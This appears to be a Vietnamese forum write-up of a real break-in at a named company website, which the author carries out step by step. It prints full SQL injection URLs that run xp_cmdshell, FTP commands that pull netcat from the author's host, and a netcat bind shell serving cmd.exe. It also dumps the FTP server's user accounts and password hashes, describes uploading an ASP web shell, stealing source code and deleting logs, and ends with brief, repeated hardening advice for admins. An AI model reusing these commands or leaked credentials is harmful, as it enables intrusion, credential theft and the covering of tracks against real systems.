1. Shell ipconfig , rồi ghi kết quả ra table , dùng query để đọc table đó . 2. Quét các ip có cùng lớp với máy chủ Web , xem ip nào có tên máy là SERVER 3. Dùng shell upload netcat lên máy rồi nối ngược ra ngoài vào máy mình , nó sẽ ghi Ip của nó trong quá trình connect . 4. attacker> nc -vv -l -p 53 sql injection> select * from openrowset('sqloledb','network=dbmssocn;address=<a ttacker_ip>,53','a') 5. Nhiều lắm , tuỳ trường hợp mà dùng thôi . Trong lần này tui sẽ dùng cách 1 cho nhanh mà đỡ bị phát hiện . www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt- 98112972003';create table ip(id int identity,nd varchar(1000)) insert into ip exec master xp_cmdshell 'ipconfig' sp_password Ta vừa tạo 1 table tên là ip , và 2 trường trong đó là id và nd trong đó id là số dòng còn nd sẽ chứa nội dung câu lệnh ipconfig . Sau đó dùng query để lấy nó ra ! www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt-98112972003' and 1=convert(int,(select top 1 nd from ip where nd like '%25IP Address%25')) sp_password Nó sẽ tìm nội dung của dòng có chữ IP Address ! Và kết quả là : Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.113.132.134 ' to a column of data type int. /thongtin/xemthongtinct.asp, line 15 Vui quá , mọi việc đều xuôn sẻ ! Tiếp theo ta upload Backdoor lên cái máy này . Ở đây tui sẽ dùng netcat một backdoor mạnh và tiện dụng . Tôi đã upload nó sẵn trên một server khác. Ta dùng shell sau để đưa nó về : www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt- 98112972003';select * from openrowset('sqloledb', 'server=SERVER;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "echo open ftp.hungrycat.org %3Eftp %26 echo user *@hungrycat.org * %3E%3Eftp %26 echo bin %3E%3Eftp %26 echo cd www %3E%3Eftp %26 echo cd donghe %3E%3Eftp %26 echo mget nc.exe %3E%3Eftp %26 echo quit %3E%3Eftp"') sp_password Lệnh trên ghi các lệnh FTP sẵn vào file tên là ftp. Nó như sau : echo open ftp.hungrycat.org >ftp echo user *@hungrycat.org * >>ftp echo bin >>ftp echo cd www >>ftp echo cd donghe >>ftp echo mget nc.exe >>ftp echo quit >ftp (* là user và password của cái host của mình ko thể tiết lộ được ) www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt- 98112972003';select * from openrowset('sqloledb', 'server=SERVER;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "ftp -v -i -n -s%3Af %26 del f"') sp_password Nó gồm có các lệnh : ftp -v -i -n -s:ftp del ftp Để upload và xoá file FTP . Vậy là xong , ta kiểm tra kết quả xem netcat đã được upload chưa . www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt- 98112972003';drop table ip create table dir(id int identity,nd varchar(1000)) insert into dir exec master xp_cmdshell 'dir nc.exe' sp_password Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'x/x/2004 x:x 11,776 nc.exe' to a column of data type int. /thongtin/xemthongtinct.asp, line 15 Ok , chạy thêm lệnh nữa để nối netcat để đổ shell về máy mình ! www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt- 98112972003';select * from openrowset('sqloledb', 'server=SERVER;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "nc -nvv -l -d -p 8080 -e cmd.exe"') sp_password nc -nvv -l -d -p 8080 -e cmd.exe : Lệnh này cho netcat lắng nghe và đổ shell trên cổng 8080 của máy chủ . Ở máy nhà ta dùng lệnh : nc -nvv 203.113.132.134 8080 để nối vào ! Nhưng ko thể connẹct Tôi đoán là nó dùng 1 route và chỉ route những cổng cần thiết về Servẹr Thôi cũng chả ham gì mà lấy shell . Tôi quyết định upload luôn một con backdoor khác lên trang web này , con này viết bằng asp nên giao tiếp bằng trình duyệt vì vậy dễ sử dụng. May mắn cho tôi là họ để chung Website với mssql! Nhưng khổ nỗi tôi lại ko biết rõ cái website họ đặt ở đâu trong đĩa cứng? Họ rất khôn ngoan khi hidden Directory Web. Lúc này đành móc mớ kinh nghiệm ít ỏi. Ftp : 203.113.132.134 Ftp 203.162.7.70 Connected to 203.162.7.70. SERVER Serv-u (Version 3.0) Vậy là họ dùng trình Serv-u phiên bản 3.0 làm máy chủ FTP . Một FTP Server phổ biến . Nó lưu thông tin về user và pass trong file ServUDaemon.ini ở thư mục c:\progra~1\serv-u www.dongavn.com.vn/thongtin/xemthongtinct.asp?mathongtin=tt- 98112972003';drop table dir create table dir(id int identity,nd varchar(1000)) insert into dir exec master xp_cmdshell 'type c:\progra~1\serv-u\ServUDaemon.ini' sp_password Sau đó dùng query để đọc file này : Kết quả sau khi đọc xong file này là : [GLOBAL] Version=3.0.0.19 RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAASgAAA+UDcD4QJwEQBUxvbmcgBkRvbmcgQQ== OpenFilesUploadMode=Shared PacketTimeOut=300 ProcessID=700 [DOMAINS] Domain1=203.113.132.134||21|www.dongavn.com.vn|1 [Domain1] User1=administrator|1|0 User2=huevb|1|0 User3=huetltk|1|0 User4=huebt|1|0 User5=backup|1|0 User6=download|1|0 User7=long|1|0 User8=hoang|1|0 [USER=administrator|1] Password=gn2A9FE054E9836D134C7053B64F2DD958 HomeDir=d:\www TimeOut=600 Note1="Wizard generated account" Access1=D:\www|RWAMLCDP [USER=huebt|1] Password=uyD0B038CDDD3487EDD023444ED889A9D4 HomeDir=d:\www\intranet\bangtinchung\thumuc_temp RelPaths=1 TimeOut=600 Access1=D:\www\Intranet\bangtinchung\thumuc_temp|R WAMLCDP [USER=huetltk|1] Password=dy622C52B31B587B8620F8183C46EAAC3C HomeDir=d:\www\intranet\bangtin\thumuc_temp RelPaths=1 TimeOut=600 Access1=D:\www\Intranet\bangtin\thumuc_temp|RWAMLC DP [USER=huevb|1] Password=kh2D5AED403D1C3F219ECB6EDCFC3DD5BE HomeDir=d:\www\intranet\vanban\vb_tailieu RelPaths=1 TimeOut=600 Access1=D:\www\Intranet\vanban|RWAMLCDP [USER=backup|1] Password=tv032D86BCD5C0FFF32C26D27DF2C389AF HomeDir=d:\backup RelPaths=1 TimeOut=600 Access1=D:\backup|RWAMLCDP [USER=download|1] Password=px4A99990818DB103405B2F7E583573556 HomeDir=d:\download RelPaths=1 TimeOut=600 Access1=D:\download|RWAMLCDP [USER=long|1] Password=bnE04DCF1DAF994215DA3F21D24F6002E8 HomeDir=d:\long RelPaths=1 TimeOut=600 Access1=D:\long|RWAMLCDP [USER=hoang|1] Password=nx07033609A0D318324AAE85F428083746 HomeDir=d:\www\intranet\dongahcm RelPaths=1 TimeOut=600 Access1=D:\www\Intranet\dongahcm|RWAMLCDP Như vậy là họ để website ở thư mục d:\www\ Ta dùng 1 lệnh nữa để upload file 4in1.asp lên d:\www\ là xong ! Dùng ie chạy : www.dongavn.com.vn/4in1.asp . Sau đó tui download toàn bộ mã nguồn của họ về máy , xoá nc.exe , table dir , 4in1.asp , log . Vì tôn chỉ hành động là ko phá hoại chỉ lấy mã nguồn website về để học hỏi nên việc xâm nhập server của tui đến đây là xong ! Qua câu truyện này có vài điều muốn nói với các Administrator . Việc đầu tiên và quan trọng nhất là hãy cập nhật các bản sửa lỗi mới nhất của các chương trình , phiên bản Microsoft SQL Server 2000 update mới nhất đã vá nhiều lỗi và ta ko thể enable user theo cách này nữa . Ko đặt chung server chứa dữ liệu và CSDL , mặc dù Hacker có thể dùng server chứa CSDL để hack Server chứa Website nhưng việc đó sẽ khó khăn hơn rất nhiều đối với người ko chuyên nghiệp. Xoá user BUILTIN\ADMINISTRATORS để hacker ko thể tận dụng password . , mặc dù Hacker có thể dùng server chứa CSDL để hack Server chứa Website nhưng việc đó sẽ khó khăn hơn rất nhiều đối với người ko chuyên nghiệp. Xoá user BUILTINADMINISTRATORS để hacker ko